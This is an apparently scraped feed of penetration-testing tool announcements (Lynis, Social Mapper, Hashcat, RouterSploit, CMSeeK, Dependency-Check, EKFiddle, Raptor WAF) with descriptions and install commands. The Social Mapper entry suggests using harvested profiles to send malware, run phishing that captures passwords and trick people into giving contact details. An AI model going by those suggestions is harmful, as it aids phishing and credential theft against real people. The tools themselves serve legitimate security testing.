Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

Lynis 2.6.7 - Security Auditing Tool for Unix/Linux Systems

$
0
0

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog
Upgrade note
## Lynis 2.6.7

### Changed
- BOOT-5104 - Added busybox as a service manager
- KRNL-5677 - Limit PAE and no-execute test to AMD64 hardware only
- LOGG-2190 - Ignore /dev/zero and /dev/[aio] as deleted files
- SSH-7408 - Changed classification of SSH root login with keys
- Docker scan uses new format for maintainer value
- New URL structure on CISOfy website implemented for Lynis controls



Social Mapper - A Social Media Enumeration & Correlation Tool

$
0
0

A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin(Greenwolf)
Social Mapper is a Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets names and pictures to accurately detect and group a person’s presence, outputting the results into report that a human operator can quickly review.
Social Mapper has a variety of uses in the security industry, for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results, so that reviewing this data is quicker for a human operator.

Social Mapper supports the following social media platforms:
  • LinkedIn
  • Facebook
  • Twitter
  • GooglePlus
  • Instagram
  • VKontakte
  • Weibo
  • Douban
Social Mapper takes a variety of input types such as:
  • An organisations name, searching via LinkedIn
  • A folder full of named images
  • A CSV file with names and url’s to images online”

Usecases (Why you want to run this)
Social Mapper is primarily aimed at Penetration Testers and Red Teamers, who will use it to expand their target lists and find their social media profiles. From here what you do is only limited by your imagination, but here are a few ideas to get started:
(Note: Social Mapper does not perform these attacks, it gathers you the data you need to perform them on a mass scale.)
  • Create fake social media profiles to 'friend' the targets and send them links or malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.
  • Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.
  • Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.
  • View target photos looking for employee access card badges and familiarise yourself with building interiors.

Getting Started
These instructions will show you the requirements for and how to use Social Mapper.

Prerequisites
As this is a python based tool, it should theoretically run on Linux, Mac and Windows. The main requirements are Firefox, Selenium and Geckodriver. To install the tool and set it up follow these 4 steps:
Install the latest version of Mozilla Firefox here:
https://www.mozilla.org/en-GB/firefox/new/
Install the Geckodriver for your operating system and make sure it's in your path, on Mac you and place it in /usr/local/bin and on Linux /usr/bin. You can down load it here:
https://github.com/mozilla/geckodriver/releases
Install the required python 2.7 libaries:
git clone https://github.com/SpiderLabs/social_mapper
cd social_mapper/setup
pip install -r requirements.txt
Provide Social Mapper with Credentials to log into social media services:
Open social_mapper.py and enter social media credentials into global variables at the top of the file

Using Social Mapper
Social Mapper is run from the command line using a mix of required and optional parameters. You can specify options such as input type and which sites to check alongside a number of other parameters which affect speed and accuracy.

Required Parameters
To start up the tool 4 parameters must be provided, an input format, the input file or folder and the basic running mode:
-f, --format : Specify if the -i, --input is a 'name', 'csv', 'imagefolder' or 'socialmapper' resume file
-i, --input : The company name, a csv file, imagefolder or social mapper html file to feed into social mapper
-m, --mode : Fast or Accurate allows you to choose to skip potential targets after a first likely match is found, in some cases potentially speeding up the program x20
Additionally at least one social media site to check must be selected by including one or more of the following:
-a, --all    : Selects all of the options below and checks every site that social mapper has credentials for
-fb, --facebook : Check Facebook
-tw, --twitter : Check Twitter
-ig, --instagram : Check Instagram
-li, --linkedin : Check LinkedIn
-gp, --googleplus : Check GooglePlus
-vk, --vkontakte : Check VKontakte
-wb, --weibo : Check Weibo
-db, --douban : Check Douban

Optional Parameters
Additional optional parameters can also be set to add additional customisation to the way social mapper runs:
-t, --threshold  : Customises the faceial recognition threshold for matches, this can be seen as the match accuracy. Default is 'standard', but can be set to loose, standard, strict or superstrict. For example loose will find more matches, but some may be incorrect. While strict may find less matches but also contain less false positives in the final report. 
-cid, --companyid : Additional parameter to add in a LinkedIn Company ID for if name searches are not picking the correct company.
-s, --showbrowser : Makes the Firefox browser visable so you can see the searches performed. Useful for debugging.
-v, --version : Display current version

Example Runs
Here are a couple of example runs to get started for differing use cases:
A quick run for facebook and twitter on some targets you have in an imagefolder, that you plan to manually review and don't mind some false positives:
python social_mapper.py -f imagefolder -i ./mytargets -m fast -fb -tw

A exhaustive run on a large company where false positives must be kept to a minimum:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -a -t strict

A large run that needs to be split over multiple sessions due to time, the first run doing LinkedIn and Facebook, with the second resuming and filling in Twitter, Google Plus and Instagram:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -li -fb
python social_mapper.py -f socialmapper -i ./SpiderLabs-social-mapper-linkedin-facebook.html -m accurate -tw -gp -ig

Troubleshooting
Social Media sites often change their page formats and class names, if Social Mapper isn't working for you on a specific site, check out the docs section for troubleshooting advice on how to fix it. Please feel free to submit a pull request with your fixes.

Maltego
For a guide to loading your Social Mapper results into Maltego, check out the docs section.

Authors



Hashcat v4.2.1 - World's Fastest and Most Advanced Password Recovery Utility

$
0
0

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking.

Installation
Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

GPU Driver requirements:
  • AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
  • AMD GPUs on Linux require "AMDGPU-PRO Driver" (16.40 or later)
  • Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
  • Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
  • Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
  • NVIDIA GPUs require "NVIDIA Driver" (367.x or later)

Features

  • World's fastest password cracker
  • World's first and only in-kernel rule engine
  • Free
  • Open-Source (MIT License)
  • Multi-OS (Linux, Windows and OSX)
  • Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
  • Multi-Hash (Cracking multiple hashes at the same time)
  • Multi-Devices (Utilizing multiple devices in same system)
  • Multi-Device-Types (Utilizing mixed device types in same system)
  • Supports distributed cracking networks (using overlay)
  • Supports interactive pause / resume
  • Supports sessions
  • Supports restore
  • Supports reading password candidates from file and stdin
  • Supports hex-salt and hex-charset
  • Supports automatic performance tuning
  • Supports automatic keyspace ordering markov-chains
  • Built-in benchmarking system
  • Integrated thermal watchdog
  • 200+ Hash-types implemented with performance in mind
  • ... and much more

Algorithms

  • MD4
  • MD5
  • Half MD5 (left, mid, right)
  • SHA1
  • SHA-224
  • SHA-256
  • SHA-384
  • SHA-512
  • SHA-3 (Keccak)
  • BLAKE2b-512
  • SipHash
  • Skip32
  • RIPEMD-160
  • Whirlpool
  • DES (PT = $salt, key = $pass)
  • 3DES (PT = $salt, key = $pass)
  • ChaCha20
  • GOST R 34.11-94
  • GOST R 34.11-2012 (Streebog) 256-bit
  • GOST R 34.11-2012 (Streebog) 512-bit
  • md5($pass.$salt)
  • md5($salt.$pass)
  • md5(unicode($pass).$salt)
  • md5($salt.unicode($pass))
  • md5($salt.$pass.$salt)
  • md5($salt.md5($pass))
  • md5($salt.md5($salt.$pass))
  • md5($salt.md5($pass.$salt))
  • md5(md5($pass))
  • md5(md5($pass).md5($salt))
  • md5(strtoupper(md5($pass)))
  • md5(sha1($pass))
  • sha1($pass.$salt)
  • sha1($salt.$pass)
  • sha1(unicode($pass).$salt)
  • sha1($salt.unicode($pass))
  • sha1(sha1($pass))
  • sha1($salt.sha1($pass))
  • sha1(md5($pass))
  • sha1($salt.$pass.$salt)
  • sha1(CX)
  • sha256($pass.$salt)
  • sha256($salt.$pass)
  • sha256(unicode($pass).$salt)
  • sha256($salt.unicode($pass))
  • sha512($pass.$salt)
  • sha512($salt.$pass)
  • sha512(unicode($pass).$salt)
  • sha512($salt.unicode($pass))
  • HMAC-MD5 (key = $pass)
  • HMAC-MD5 (key = $salt)
  • HMAC-SHA1 (key = $pass)
  • HMAC-SHA1 (key = $salt)
  • HMAC-SHA256 (key = $pass)
  • HMAC-SHA256 (key = $salt)
  • HMAC-SHA512 (key = $pass)
  • HMAC-SHA512 (key = $salt)
  • PBKDF2-HMAC-MD5
  • PBKDF2-HMAC-SHA1
  • PBKDF2-HMAC-SHA256
  • PBKDF2-HMAC-SHA512
  • MyBB
  • phpBB3
  • SMF (Simple Machines Forum)
  • vBulletin
  • IPB (Invision Power Board)
  • WBB (Woltlab Burning Board)
  • osCommerce
  • xt:Commerce
  • PrestaShop
  • MediaWiki B type
  • WordPress
  • Drupal 7
  • Joomla
  • PHPS
  • Django (SHA-1)
  • Django (PBKDF2-SHA256)
  • Episerver
  • ColdFusion 10+
  • Apache MD5-APR
  • MySQL
  • PostgreSQL
  • MSSQL
  • Oracle H: Type (Oracle 7+)
  • Oracle S: Type (Oracle 11+)
  • Oracle T: Type (Oracle 12+)
  • Sybase
  • hMailServer
  • DNSSEC (NSEC3)
  • IKE-PSK
  • IPMI2 RAKP
  • iSCSI CHAP
  • CRAM-MD5
  • MySQL CRAM (SHA1)
  • PostgreSQL CRAM (MD5)
  • SIP digest authentication (MD5)
  • WPA/WPA2
  • WPA/WPA2 PMK
  • NetNTLMv1
  • NetNTLMv1+ESS
  • NetNTLMv2
  • Kerberos 5 AS-REQ Pre-Auth etype 23
  • Kerberos 5 TGS-REP etype 23
  • Netscape LDAP SHA/SSHA
  • FileZilla Server
  • LM
  • NTLM
  • Domain Cached Credentials (DCC), MS Cache
  • Domain Cached Credentials 2 (DCC2), MS Cache 2
  • DPAPI masterkey file v1 and v2
  • MS-AzureSync PBKDF2-HMAC-SHA256
  • descrypt
  • bsdicrypt
  • md5crypt
  • sha256crypt
  • sha512crypt
  • bcrypt
  • scrypt
  • macOS v10.4
  • macOS v10.5
  • macOS v10.6
  • macOS v10.7
  • macOS v10.8
  • macOS v10.9
  • macOS v10.10
  • iTunes backup < 10.0
  • iTunes backup >= 10.0
  • AIX {smd5}
  • AIX {ssha1}
  • AIX {ssha256}
  • AIX {ssha512}
  • Cisco-ASA MD5
  • Cisco-PIX MD5
  • Cisco-IOS $1$ (MD5)
  • Cisco-IOS type 4 (SHA256)
  • Cisco $8$ (PBKDF2-SHA256)
  • Cisco $9$ (scrypt)
  • Juniper IVE
  • Juniper NetScreen/SSG (ScreenOS)
  • Juniper/NetBSD sha1crypt
  • Fortigate (FortiOS)
  • Samsung Android Password/PIN
  • Windows Phone 8+ PIN/password
  • GRUB 2
  • CRC32
  • RACF
  • Radmin2
  • Redmine
  • PunBB
  • OpenCart
  • Atlassian (PBKDF2-HMAC-SHA1)
  • Citrix NetScaler
  • SAP CODVN B (BCODE)
  • SAP CODVN F/G (PASSCODE)
  • SAP CODVN H (PWDSALTEDHASH) iSSHA-1
  • PeopleSoft
  • PeopleSoft PS_TOKEN
  • Skype
  • WinZip
  • 7-Zip
  • RAR3-hp
  • RAR5
  • AxCrypt
  • AxCrypt in-memory SHA1
  • PDF 1.1 - 1.3 (Acrobat 2 - 4)
  • PDF 1.4 - 1.6 (Acrobat 5 - 8)
  • PDF 1.7 Level 3 (Acrobat 9)
  • PDF 1.7 Level 8 (Acrobat 10 - 11)
  • MS Office <= 2003 MD5
  • MS Office <= 2003 SHA1
  • MS Office 2007
  • MS Office 2010
  • MS Office 2013
  • Lotus Notes/Domino 5
  • Lotus Notes/Domino 6
  • Lotus Notes/Domino 8
  • Bitcoin/Litecoin wallet.dat
  • Blockchain, My Wallet
  • Blockchain, My Wallet, V2
  • 1Password, agilekeychain
  • 1Password, cloudkeychain
  • LastPass
  • Password Safe v2
  • Password Safe v3
  • KeePass 1 (AES/Twofish) and KeePass 2 (AES)
  • JKS Java Key Store Private Keys (SHA1)
  • Ethereum Wallet, PBKDF2-HMAC-SHA256
  • Ethereum Wallet, SCRYPT
  • eCryptfs
  • Android FDE <= 4.3
  • Android FDE (Samsung DEK)
  • TrueCrypt
  • VeraCrypt
  • LUKS
  • Plaintext

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict
* accept Rules

Supported OpenCL runtimes

  • AMD
  • Apple
  • Intel
  • Mesa (Gallium)
  • NVidia
  • pocl

Supported OpenCL device types

  • GPU
  • CPU
  • APU
  • DSP
  • FPGA
  • Coprocessor

    RouterSploit v3.3.0 - Exploitation Framework For Embedded Devices

    $
    0
    0

    The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.

    It consists of various modules that aids penetration testing operations:
    • exploits - modules that take advantage of identified vulnerabilities
    • creds - modules designed to test credentials against network services
    • scanners - modules that check if a target is vulnerable to any exploit
    • payloads - modules that are responsible for generating payloads for various architectures and injection points
    • generic - modules that perform generic attacks


    Installation

    Requirements
    Required:
    • future
    • requests
    • paramiko
    • pysnmp
    • pycrypto
    Optional:
    • bluepy - bluetooth low energy

    Installation on Kali Linux
    apt-get install python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py
    Bluetooth Low Energy support:
    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

    Installation on Ubuntu 18.04 & 17.10
    sudo add-apt-repository universe
    sudo apt-get install git python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py
    Bluetooth Low Energy support:
    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

    Installation on OSX
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    sudo python3 -m pip install -r requirements.txt
    python3 rsf.py

    Running on Docker
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    docker build -t routersploit .
    docker run -it --rm routersploit

    Update
    Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
    cd routersploit
    git pull


    CMSeeK v1.0.7 - CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 50 Other CMSs)

    $
    0
    0

    What is a CMS?
    A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.

    Release History
    - Version 1.0.7 [07-08-2018]
    - Version 1.0.6 [23-07-2018]
    - Version 1.0.5 [19-07-2018]
    - Version 1.0.4 [17-07-2018]
    - Version 1.0.3 [06-07-2018]
    - Version 1.0.2 [06-07-2018]
    - Version 1.0.1 [19-06-2018]
    - Version 1.0.0 [15-06-2018]
    Changelog File

    Functions Of CMSeek:
    • Basic CMS Detection of over 30 CMS
    • Drupal version detection
    • Advanced Wordpress Scans
      • Detects Version
      • User Enumeration
      • Plugins Enumeration
      • Theme Enumeration
      • Detects Users (3 Detection Methods)
      • Looks for Version Vulnerabilities and much more!
    • Advanced Joomla Scans
      • Version detection
      • Backup files finder
      • Admin page finder
      • Core vulnerability detection
      • Directory listing check
      • Config leak detection
      • Various other checks
    • Modular bruteforce system
      • Use pre made bruteforce modules or create your own and integrate with it

    Requirements and Compatibility:
    CMSeeK is built using python3, you will need python3 to run this tool and is compitable with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update so make sure git is installed.

    Installation and Usage:
    It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:
    • git clone https://github.com/Tuhinshubhra/CMSeeK
    • cd CMSeeK
    For guided scanning:
    • python3 cmseek.py
    Else:
    • python3 cmseek.py -u <target_url> [...]
    Help menu from the program:
    USAGE:
    python3 cmseek.py (for a guided scanning) OR
    python3 cmseek.py [OPTIONS] <Target Specification>

    SPECIFING TARGET:
    -u URL, --url URL Target Url
    -l LIST, -list LIST path of the file containing list of sites
    for multi-site scan (comma separated)

    USER AGENT:
    -r, --random-agent Use a random user agent
    --user-agent USER_AGENT Specify custom user agent

    OUTPUT:
    -v, --verbose Increase output verbosity

    VERSION & UPDATING:
    --update Update CMSeeK (Requires git)
    --version Show CMSeeK version and exit

    HELP & MISCELLANEOUS:
    -h, --help Show this help message and exit
    --clear-result Delete all the scan result

    EXAMPLE USAGE:
    python3 cmseek.py -u example.com # Scan example.com
    python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
    python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here
    python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
    python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com

    Checking For Update:
    You can check for update either from the main menu or use python3 cmseek.py --update to check for update and apply auto update.
    P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.

    Detection Methods:
    CMSeek detects CMS via the following:
    • HTTP Headers
    • Generator meta tag
    • Page source code
    • robots.txt

    Supported CMSs:
    CMSeeK currently can detect 40 CMSs, you can find the list on cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way:
     cmsID = {
    'name':'Name Of CMS',
    'url':'Official URL of the CMS',
    'vd':'Version Detection (0 for no, 1 for yes)',
    'deeps':'Deep Scan (0 for no 1 for yes)'
    }

    Scan Result:
    All of your scan results are stored in a json file named cms.json, you can find the logs inside the Result\<Target Site> directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well.
    Here is an example of the json report log:


    Bruteforce Modules:
    CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:
    1. Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex
    2. Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module
    3. Copy and paste the module in the brutecms directory under CMSeeK's directory
    4. Open CMSeeK and Rebuild Cache using U as the input in the first menu.
    5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.

    Need More Reasons To Use CMSeeK?
    If not anything you can always enjoy exiting CMSeeK (please don't), it will bid you goodbye in a random goodbye message in various languages.
    Also you can try reading comments in the code those are pretty random and weird!!!

    Screenshots:




    DependencyCheck v3.3.1 - A Software Composition Analysis Utility That Detects Publicly Disclosed Vulnerabilities In Application Dependencies

    $
    0
    0

    Dependency-Check is a Software Composition Analysis (SCA) tool that attempts to detect publicly disclosed vulnerabilities contained within a project's dependencies. It does this by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If found, it will generate a report linking to the associated CVE entries.
    Documentation and links to production binary releases can be found on the github pages. Additionally, more information about the architecture and ways to extend dependency-check can be found on the wiki.

    Current Releases

    Jenkins Plugin
    For instructions on the use of the Jenkins plugin please see the OWASP Dependency-Check Plugin page.

    Command Line
    More detailed instructions can be found on the dependency-check github pages. The latest CLI can be downloaded from bintray's dependency-check page.
    On *nix
    $ ./bin/dependency-check.sh -h
    $ ./bin/dependency-check.sh --project Testing --out . --scan [path to jar files to be scanned]
    On Windows
    > .\bin\dependency-check.bat -h
    > .\bin\dependency-check.bat --project Testing --out . --scan [path to jar files to be scanned]
    On Mac with Homebrew
    $ brew update && brew install dependency-check
    $ dependency-check -h
    $ dependency-check --project Testing --out . --scan [path to jar files to be scanned]

    Maven Plugin
    More detailed instructions can be found on the dependency-check-maven github pages. By default, the plugin is tied to the verify phase (i.e. mvn verify). Alternatively, one can directly invoke the plugin via mvn org.owasp:dependency-check-maven:check.
    The dependency-check plugin can be configured using the following:
    <project>
    <build>
    <plugins>
    ...
    <plugin>
    <groupId>org.owasp</groupId>
    <artifactId>dependency-check-maven</artifactId>
    <executions>
    <execution>
    <goals>
    <goal>check</goal>
    </goals>
    </execution>
    </executions>
    </plugin>
    ...
    </plugins>
    ...
    </build>
    ...
    </project>

    Ant Task
    For instructions on the use of the Ant Task, please see the dependency-check-ant github page.

    Development Usage
    The following instructions outline how to compile and use the current snapshot. While every intention is to maintain a stable snapshot it is recommended that the release versions listed above be used.
    The repository has some large files due to test resources. The team has tried to clean up the history as much as possible. However, it is recommended that you perform a shallow clone to save yourself time:
    git clone --depth 1 https://github.com/jeremylong/DependencyCheck.git
    On *nix
    $ mvn install
    $ ./cli/target/release/bin/dependency-check.sh -h
    $ ./cli/target/release/bin/dependency-check.sh --project Testing --out . --scan ./src/test/resources
    On Windows
    > mvn install
    > .\dependency-check-cli\target\release\bin\dependency-check.bat -h
    > .\dependency-check-cli\target\release\bin\dependency-check.bat --project Testing --out . --scan ./src/test/resources
    Then load the resulting 'dependency-check-report.html' into your favorite browser.

    Docker
    In the following example it is assumed that the source to be checked is in the current working directory. Persistent data and report directories are used, allowing you to destroy the container after running.
    #!/bin/sh

    OWASPDC_DIRECTORY=$HOME/OWASP-Dependency-Check
    DATA_DIRECTORY="$OWASPDC_DIRECTORY/data"
    REPORT_DIRECTORY="$OWASPDC_DIRECTORY/reports"

    if [ ! -d "$DATA_DIRECTORY" ]; then
    echo "Initially creating persistent directories"
    mkdir -p "$DATA_DIRECTORY"
    chmod -R 777 "$DATA_DIRECTORY"

    mkdir -p "$REPORT_DIRECTORY"
    chmod -R 777 "$REPORT_DIRECTORY"
    fi

    # Make sure we are using the latest version
    docker pull owasp/dependency-check

    docker run --rm \
    --volume $(pwd):/src \
    --volume "$DATA_DIRECTORY":/usr/share/dependency-check/data \
    --volume "$REPORT_DIRECTORY":/report \
    owasp/dependency-check \
    --scan /src \
    --format "ALL" \
    --project "My OWASP Dependency Check Project" \
    --out /report
    # Use suppression like this: (/src == $pwd)
    # --suppression "/src/security/dependency-check-suppression.xml"

    Upgrade Notes

    Upgrading from 1.x.x to 2.x.x
    Note that when upgrading from version 1.x.x that the following changes will need to be made to your configuration.

    Suppression file
    In order to support multiple suppression files, the mechanism for configuring suppression files has changed. As such, users that have defined a suppression file in their configuration will need to update.
    See the examples below:

    Ant
    Old:
    <dependency-check
    failBuildOnCVSS="3"
    suppressionFile="suppression.xml">
    </dependency-check>
    New:
    <dependency-check
    failBuildOnCVSS="3">
    <suppressionFile path="suppression.xml" />
    </dependency-check>

    Maven
    Old:
    <plugin>
    <groupId>org.owasp</groupId>
    <artifactId>dependency-check-maven</artifactId>
    <configuration>
    <suppressionFile>suppression.xml</suppressionFile>
    </configuration>
    </plugin>
    New:
    <plugin>
    <groupId>org.owasp</groupId>
    <artifactId>dependency-check-maven</artifactId>
    <configuration>
    <suppressionFiles>
    <suppressionFile>suppression.xml</suppressionFile>
    </suppressionFiles>
    </configuration>
    </plugin>

    Gradle
    In addition to the changes to the suppression file, the task dependencyCheck has been renamed to dependencyCheckAnalyze.
    Old:
    buildscript {
    repositories {
    mavenLocal()
    }
    dependencies {
    classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
    }
    }
    apply plugin: 'org.owasp.dependencycheck'

    dependencyCheck {
    suppressionFile='path/to/suppression.xml'
    }
    check.dependsOn dependencyCheckAnalyze
    New:
    buildscript {
    repositories {
    mavenLocal()
    }
    dependencies {
    classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
    }
    }
    apply plugin: 'org.owasp.dependencycheck'

    dependencyCheck {
    suppressionFiles = ['path/to/suppression1.xml', 'path/to/suppression2.xml']
    }
    check.dependsOn dependencyCheckAnalyze


    EKFiddle - A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

    $
    0
    0

    A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.

    Installation

    Download and install the latest version of Fiddler
    https://www.telerik.com/fiddler
    Special instructions for Linux and Mac here:
    https://www.telerik.com/blogs/fiddler-for-linux-beta-is-here
    https://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1

    Enable C# scripting (Windows only)
    Launch Fiddler, and go to Tools -> Options
    In the Scripting tab, change the default (JScript.NET) to C#.

    Change default text editor (optional)
    In the same Tools -> Options menu, click on the Tools tab.
    • Windows: notepad.exe or notepad++.exe
    • Linux: gedit
    • Mac: /Applications/TextEdit.app or /Applications/TextWrangler.app
    Close Fiddler

    Download or clone CustomRules.cs into the appropriate folder based on your operating system:
    • Windows (7/10) C:\Users\[username]\Documents\Fiddler2\Scripts\
    • Ubuntu /home/[username]/Fiddler2/Scripts/
    • Mac /Users/[username]/Fiddler2/Scripts/

    Finish up the installation
    Start Fiddler to complete the installation of EKFiddle. That's it, you're all set!

    Features

    Toolbar buttons
    The added toolbar buttons give you quick shortcuts to some of the main features:


    QuickSave
    Dumps current web sessions into a SAZ named (QuickSave-"MM-dd-yyyy-HH-mm-ss".saz) to EKFiddle\Captures.

    UI mode
    Toggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).

    VPN
    VPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with ovpn files (sigining up with commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous to ensure only one TAP adapter is used at any given time.
    • Windows
    Download and install OpenVPN in default directory
    Place your .ovpn files inside OpenVPN's config folder.
    • Linux (tested on Ubuntu 16.04)
    sudo apt-get install openvpn
    Place your .ovpn files in /etc/openvpn.

    Proxy
    Allows you to connect to an upstream proxy (HTTP/s or SOCKS).

    Import SAZ/PCAP
    A shortcut to load SAZ (Fiddler's native format) or PCAP (i.e. from Wireshark) captures.

    View/Edit Regexes
    View and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.

    Run Regexes
    Run the master and custom regular expressions against current web sessions.

    Clear Markings
    Clear any comment and colour highlighting in the currently loaded sessions.

    ContextAction menu
    The ContextAction menu (accessed by right-clicking on any session(s) allows you to perform additional commands on selected sections. This can be very helpful to do quick lookups, compute hashes or extract IOCs.

    Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ)
    Query the hostname for the currently selected session.

    URI

    Build Regex
    Create a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.

    Open in... Internet Explorer, Chrome, Firefox, Edge
    This opens up the URI with the browser you selected.

    Response Body

    Remove encoding
    Decodes the currently selected sessions (from their basic encoding).

    Build Regex
    Create a regular expression from the currently selected session's source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.

    Calculate MD5/SHA256 hash
    Get the current session's body and computes its hash.

    Hybrid Analysis / VirusTotal lookup
    Checks the current session's body for hash, then look up that hash.

    Extract to Disk
    Downloads the currently selection session(s)'s body to disk, into the 'Artifacts' folder.

    Extract IOCs
    Copies into memory basic information from selected sessions so that they can be shared as IOCs.

    Connect-the-dots
    Allows you to identify the sequence of events between sessions. Right-clik on the session you are interested in retracing your steps to and simply 'connect the dots'. It will label the sequence of events from 01, to n within the comments column. You can reorder that column to have a condensed view of the sequence.

    Crawler
    Load a list of URLs from a text file and let the browser automically visit them. Tools -> Crawler (experimental) -> Start crawler May require some tweaks in your browser's settings, in particular with regards to crash recovery IE: not needed Firefox: about:config, set -1 value for toolkit.startup.max_resumed_crashes Chrome: not needed Edge: fix already included

    Uninstalling EKFiddle
    Delete CustomRules.cs


    Raptor WAF v0.5 - Web Application Firewall using DFA

    $
    0
    0

    Raptor is a Web application firewall made in C, uses DFA to block SQL injection, Cross site scripting and path traversal.

    to run:
    $ git clone https://github.com/CoolerVoid/raptor_waf
    $ cd raptor_waf; make; bin/raptor

    #Note: Don't execute with "cd bin; ./raptor" use full path "bin/raptor" look detail https://github.com/CoolerVoid/raptor_waf/issues/4
    Need lib pcre to compile.

    Example
    Up some HTTPd server at port 80 redirect with raptor to port 8883
